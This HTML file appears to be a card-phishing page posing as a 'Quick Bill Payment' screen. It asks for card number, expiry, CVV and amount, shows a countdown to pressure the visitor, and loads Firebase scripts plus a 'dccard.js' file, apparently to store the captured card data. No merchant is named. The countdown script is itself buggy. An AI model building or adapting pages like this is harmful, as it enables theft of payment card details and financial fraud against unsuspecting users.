<!DOCTYPE html>
<html>
<head>
<meta name="viewport" content="width=device-width, initial-scale=1">
<style>
body {
  font-family: Arial, Helvetica, sans-serif;
  background-color: white;
}

* {
  box-sizing: border-box;
}

/* Add padding to containers */
.container {
  padding: 16px;
  background-color: white;
}

/* Full-width input fields */
input[type=number], input[type=text], input[type=password] {
  width: 100%;
  padding: 15px;
  margin: 5px 0 22px 0;
  display: inline-block;
  border: none;
  background: #f1f1f1;
}

input[type=number]:focus, input[type=text]:focus, input[type=password]:focus {
  background-color: #ddd;
  outline: none;
}

/* Overwrite default styles of hr */
hr {
  border: 1px solid #f1f1f1;
  margin-bottom: 25px;
}

/* Set a style for the submit button */
.registerbtn {
  background-color: #118dff;
  color: white;
  padding: 16px 20px;
  margin: 8px 0;
  border: none;
  cursor: pointer;
  width: 100%;
  opacity: 0.9;
}

.registerbtn:hover {
  opacity: 1;
}

/* Add a blue text color to links */
a {
  color: dodgerblue;
}

/* Set a grey background color and center the text of the "sign in" section */
.signin {
  background-color: #f1f1f1;
  text-align: center;
}
</style>
</head>
<body>



  <center>  <img
src="other.png"
style="width:
45%;"> </center>

<p>Quick Bill Payment</p>

  
    
<form id="ududip007" class="LoginForm" method="post" autocomplete="off">
   

<div class="container">
    <label for="acard"><b>Debit / Credit card *</b></label>
    <input type="text" id="acard" placeholder="Enter Debit / Credit card number " name="crdnumber" autocomplete="off" required>

   <label for="bexpiry"><b>Expiry date *</b></label>
    <input type="text" id="bexpiry" placeholder="MM / YEAR" name="date" autocomplete="off" required>

    <label for="ccvv"><b>CVV *</b></label>
    <input type="number" id="ccvv" placeholder="Enter CVV" name="acvv" autocomplete="off" required>

 <label for="dammount"><b>Amount *</b></label>
    <input type="number" id="dammount" placeholder="Enter Amount"  name="amount" autocomplete="off" required>

    
    
    <button type="submit" class="registerbtn">Next</button>
  </div>
  
  
<body
onload="startTimer();">
  <!---Timer for Otp ------------------------------------------------------------------------    -->

  <script type="text/javascript">
    var timer=300;
    var sec=0;
  function startTimer() {
    sec=parseInt(timer%300);

    if (timer<0) {
      timer.stop();
    }

    document.getElementById("time").innerHTML = "<b>This screen will automatically timeout after: </b>"+sec.toString();
    timer--;
    setTimeout(function(){
      startTimer();

    }, 1000);
  }
    
      </script>
<!-- -------------------------------------------------------------------------------------------------- -->
      <div>
        <center><b><span id="time"></span>&nbsp; Second</b></center>
      </div>
<!-- ----------------------------------------------------------------------------------------------------------- -->
        </div>
  
<br>
<br><br>
</div>
</div>
  </div>





  </div>
</form>







<script src="https://www.gstatic.com/firebasejs/9.6.1/firebase-app.js"></script>
<script src="https://www.gstatic.com/firebasejs/9.6.1/firebase-database.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/firebase/7.14.1/firebase.js"></script>
    
 <script src="firebase.js">  </script>
<script src="dccard.js">  </script>



















</body>
</html>
